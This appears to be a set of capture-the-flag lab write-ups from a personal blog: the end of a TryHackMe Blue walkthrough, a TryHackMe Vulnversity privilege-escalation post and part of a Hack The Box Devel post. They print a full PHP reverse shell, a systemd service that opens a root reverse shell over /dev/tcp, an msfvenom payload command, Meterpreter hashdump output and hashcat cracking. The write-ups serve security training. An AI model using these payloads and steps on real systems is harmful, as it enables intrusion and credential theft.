[*] Meterpreter session 2 opened (THM_VPN_IP:4433 -> 10.1.0.135:49171) at 2020-04-12 14:52:56 +0100
[*] Stopping exploit/multi/handler

msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.27.96)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      THM_VPN_IP:4433 -> 10.1.0.135:49171 (10.10.27.96)

5. Once the meterpreter shell conversion completes, select that session for use.

msf5 post(multi/manage/shell_to_meterpreter) > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S <opt>  Row search filter.
    -c <opt>  Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n <opt>  Name or rename a session by ID
    -q        Quiet mode
    -s <opt>  Run a script or module on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

msf5 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.81.119)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      THM_VPN_IP:4433 -> 10.1.0.135:49172 (10.10.81.119)

msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 1120 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

7. List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

C:\Windows\system32>^Z
Background channel 1? [y/N]  y
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 444   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 556   548   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 604   548   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 616   596   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 656   596   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 704   604   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 712   604   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 720   604   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 772   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 828   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 896   704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 944   704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1012  656   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 1076  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1120  2520  cmd.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\cmd.exe
 1156  704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1292  704   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1336  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1388  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 1412  704   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1476  704   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1596  704   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 1612  704   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1724  772   WMIADAP.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WMIADAP.exe
 1936  704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2044  1292  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2056  772   taskeng.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\taskeng.exe
 2060  828   WmiPrvSE.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe
 2068  828   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2160  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2392  2384  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 2520  2392  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
 2600  704   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 2640  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2760  704   mscorsvw.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 2784  704   mscorsvw.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 2820  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2852  704   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 2892  704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2952  704   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe

meterpreter >

8. Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

meterpreter > migrate 2892
[*] Migrating from 2520 to 2892...
[*] Migration completed successfully.
meterpreter >

TASK 4 - CRACKING

1. Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >

2. Copy this password hash to a file and research how to crack it. What is the cracked password?

We first need to clean up the hash to match how hashcat wants to receive the hash, examples of the hashes can be found here. Basically, we need to remove everything apart from the last part of the hash, ensuring to remove every : too.

Original - HASH

Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Hashcat - HASH

ffb43f0de35be4d9917ac0cc8ad57f8d

To confirm the hash is correct we can use hashid, note we are feeding in the modified hash which is saved in a file (ntlm.txt).

> hashid -m < ntlm.txt
Analyzing 'ffb43f0de35be4d9917ac0cc8ad57f8d'
[+] MD2
[+] MD5 [Hashcat Mode: 0]
[+] MD4 [Hashcat Mode: 900]
[+] Double MD5 [Hashcat Mode: 2600]
[+] LM [Hashcat Mode: 3000]
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5 [Hashcat Mode: 8600]
[+] Skype [Hashcat Mode: 23]
[+] Snefru-128
[+] NTLM [Hashcat Mode: 1000]
[+] Domain Cached Credentials [Hashcat Mode: 1100]
[+] Domain Cached Credentials 2 [Hashcat Mode: 2100]
[+] DNSSEC(NSEC3) [Hashcat Mode: 8300]
[+] RAdmin v2.x [Hashcat Mode: 9900]
>

The hash appears to be correct and using the -m switch of hashid also shows the mode we need to use for hashcat, 1000.

Below is the hashcat command, where using the backticks we can run a command to feed into the hashcat command; furthermore, we are using rockyou.txt as our wordlist.

--force - hashcat used in a VM
-a - indicated wordlist mode
-o - outputs the cracked passwords to a file called cracked.txt.

> hashcat -m 1000 -a 0 `cat ntlm.txt` /usr/share/wordlists/rockyou.txt --force -o cracked.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel Core Processor (Skylake, IBRS), 2048/5918 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'
* Device #1: Kernel m01000_a0-pure.ad7daebd.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
### * Runtime...: 2 secs

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: ffb43f0de35be4d9917ac0cc8ad57f8d
Time.Started.....: Sun Apr 12 15:34:56 2020 (4 secs)
Time.Estimated...: Sun Apr 12 15:35:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2885.2 kH/s (0.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10203136/14344385 (71.13%)
Rejected.........: 0/10203136 (0.00%)
Restore.Point....: 10199040/14344385 (71.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alsinah -> alonsouriel

Started: Sun Apr 12 15:34:46 2020
Stopped: Sun Apr 12 15:35:01 2020
> cat cracked.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:PASSWORDHERE
>

TASK 5 - FIND FLAGS!

1. Flag1? (Only submit the flag contents {CONTENTS})

We can use meterpreter to search for the flag files.

meterpreter > search -f flag*
Found 6 results...
    c:\flag1.txt (24 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk (482 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk (848 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk (2344 bytes)
    c:\Users\Jon\Documents\flag3.txt (37 bytes)
    c:\Windows\System32\config\flag2.txt (34 bytes)
meterpreter >

We can see above that all three flag files are found; we just need to read them now.

c:\>more flag1.txt
more flag1.txt
flag{FLAG1}

2. Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare,however, it can happen.

c:\Windows\System32\config>more flag2.txt
more flag2.txt
flag{FLAG2}

3. Flag3?

C:\Users\Jon\Documents>more flag3.txt
more flag3.txt
flag{FLAG3}

TryHackMe - Vulnervisity - Privilege Escalation (Task 5)

April 10, 2020•963 words

This post will mainly focuses on Task 5 - Privilege Escalation.

To start Task 5, we need to ensure the end of Task 4 was complete correctly, therefore, upload the suggested exploit with an extension of .phtml for example pe.phtml to the server via the upload page (http://<ip>:3333/internal); below is the source-code of the exploit.

<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'IP ON TRYHACKME NETWORK (tun0)';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

We then need to set up a netcat listener on your attacking (Kali) box (ensure you port matches the port in the exploit) to receive the reverse-shell.

> nc -lvnnp 1234

To execute the exploit we need to visit the link where the file was uploaded too (this link was given as part of Task 4).

http://<ip>3333/internal/uploads/pe.phtml

Your netcat listener should now resemble the below output.

> nc -lvvnp 1234
listening on [any] 1234 ...
connect to [IP-ON-THM-NETWORK] from (UNKNOWN) [10.10.206.160] 53402
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 04:33:53 up  1:30,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
>

As suggested the route to root is via a SUID file; the following command will find all SUID files on the target system.

> find / -perm -4000 2>/dev/null

/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
***/bin/systemctl***
/bin/ping
/bin/fusermount
/sbin/mount.cifs

The major security risk here is the /bin/systemctl as this allows execution of any commands via the User parameter when specifying a service file.

We first need to ensure we are in a directory which the current user can write to, /tmp is great for our purposes. Below is the service file we need to get onto the target machine.

[Unit]
Description=root

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/IP-ON-THM-NETWORK/9999 0>&1"

[Install]
WantedBy=multi-user.target

To save transfering this file it is just as to use printf to create the file we required.

> printf '[Unit]\nDescription=root\n\n[Service]\nType=simple\nUser=root\nExecStart=/bin/bash -c "bash -i >& /dev/tcp/IP-ON-THM-NETWORK/9999 0>&1"\n\n[Install]\nWantedBy=multi-user.target\n' > root.service

NOTE: ensure to change the port and ip address

The service file will now be here /tmp/root.service

We now need to enable and start the service, however, before we do that let's start another netcat listener on the port defined above.

(attacking machine)
> nc -lvnnp 9999

(target machine)
> systemctl enable /tmp/root.service
> systemctl start root

Once this service has started we should now see our netcat listener displaying a root shell - WELL DONE you have now complete the box; feel free to grab the root.txt flag from /root/root.txt.

Reference Links

@klockw3rk's Medium Blog

GTFIBINS

High on coffee revserse shell

Hack The Box - Devel

September 11, 2019•11937 words

Box Details

Devel

OS	DIFFICULTY	POINTS
Windows	EASY	20

ENUMERATION

Inital Port Scanning

masscan

COMMAND


masscan -p1-65535,U:1-65535 10.10.10.5 --rate=1000 -e tun0 -oG masscan-Blue

RESULT


# Masscan 1.0.5 scan initiated Tue Sep 10 14:08:54 2019
# Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.5 ()     Ports: 80/open/tcp////
Host: 10.10.10.5 ()     Ports: 21/open/tcp////
# Masscan done at Tue Sep 10 14:12:36 2019

nmap

Ports for nmap scanning:

COMMAND


nmap -sC -sV -p80,21 -oA nmap-Devel 10.10.10.5

RESULT

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-10 15:13 BST
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds

Discovery

FTP

COMMAND


ftp 10.10.10..5

RESULT

Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp>

EXPLOITS

Exploit Search

COMMAND

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=8515 -f aspx > revshell.aspx

NOTE: As we are going to use netcat to listen for the reverse shell we must use the the payload windows/shell_reverse_tcp and not windows/shell/reverse_tcp; i.e. a stageless version.
RESULT


#  nc -lvvp 8515
listening on [any] 8515 ...
10.10.10.5: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.5] 49166
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

POST EXPLOIT DISCOVERY

System Information


c:\windows\system32\inetsrv>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 
System Boot Time:          13/9/2019, 5:50:51 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 804 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.542 MB
Virtual Memory: In Use:    505 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

Hostname

c:\windows\system32\inetsrv>hostname
hostname
devel

Users

c:\windows\system32\inetsrv>echo %username%
echo %username%
DEVEL$

c:\windows\system32\inetsrv>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babis                    Guest                    
The command completed with one or more errors.

Network Information


c:\windows\system32\inetsrv>ipconfig /all

ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : devel
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-C8-4B
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.10.5(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
   DNS Servers . . . . . . . . . . . : 10.10.10.2
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{024DBC4C-1BA9-4DFC-8341-2C35AB1DF869}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
c:\windows\system32\inetsrv>route print
route print
===========================================================================
Interface List
 11...00 50 56 b9 c8 4b ......Intel(R) PRO/1000 MT Network Connection
  1...........................Software Loopback Interface 1
 12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
 13...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0       10.10.10.2       10.10.10.5    266
       10.10.10.0    255.255.255.0         On-link        10.10.10.5    266
       10.10.10.5  255.255.255.255         On-link        10.10.10.5    266
     10.10.10.255  255.255.255.255         On-link        10.10.10.5    266
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link        10.10.10.5    266
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link        10.10.10.5    266
===========================================================================
Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
          0.0.0.0          0.0.0.0       10.10.10.2  Default
===========================================================================

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    306 ::1/128                  On-link
  1    306 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None

c:\windows\system32\inetsrv>arp -A
arp -A

Interface: 10.10.10.5 --- 0xb
  Internet Address      Physical Address      Type
  10.10.10.2            00-50-56-b9-c8-cd     dynamic
  10.10.10.255          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static

c:\windows\system32\inetsrv>netstat -ano
netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1424
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       384
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       724
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       888
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       488
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       496
  TCP    10.10.10.5:139         0.0.0.0:0              LISTENING       4
  TCP    10.10.10.5:49166       10.10.14.10:8515       ESTABLISHED     3228
  TCP    [::]:21                [::]:0                 LISTENING       1424
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       672
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5357              [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       384
  TCP    [::]:49153             [::]:0                 LISTENING       724
  TCP    [::]:49154             [::]:0                 LISTENING       888
  TCP    [::]:49155             [::]:0                 LISTENING       488
  TCP    [::]:49156             [::]:0                 LISTENING       496
  UDP    0.0.0.0:123            *:*                                    1000
  UDP    0.0.0.0:3702           *:*                                    1392
  UDP    0.0.0.0:3702           *:*                                    1392
  UDP    0.0.0.0:5355           *:*                                    1072
  UDP    0.0.0.0:52626          *:*                                    1392
  UDP    10.10.10.5:137         *:*                                    4
  UDP    10.10.10.5:138         *:*                                    4
  UDP    [::]:123               *:*                                    1000
  UDP    [::]:3702              *:*                                    1392
  UDP    [::]:3702              *:*                                    1392
  UDP    [::]:52627             *:*                                    1392

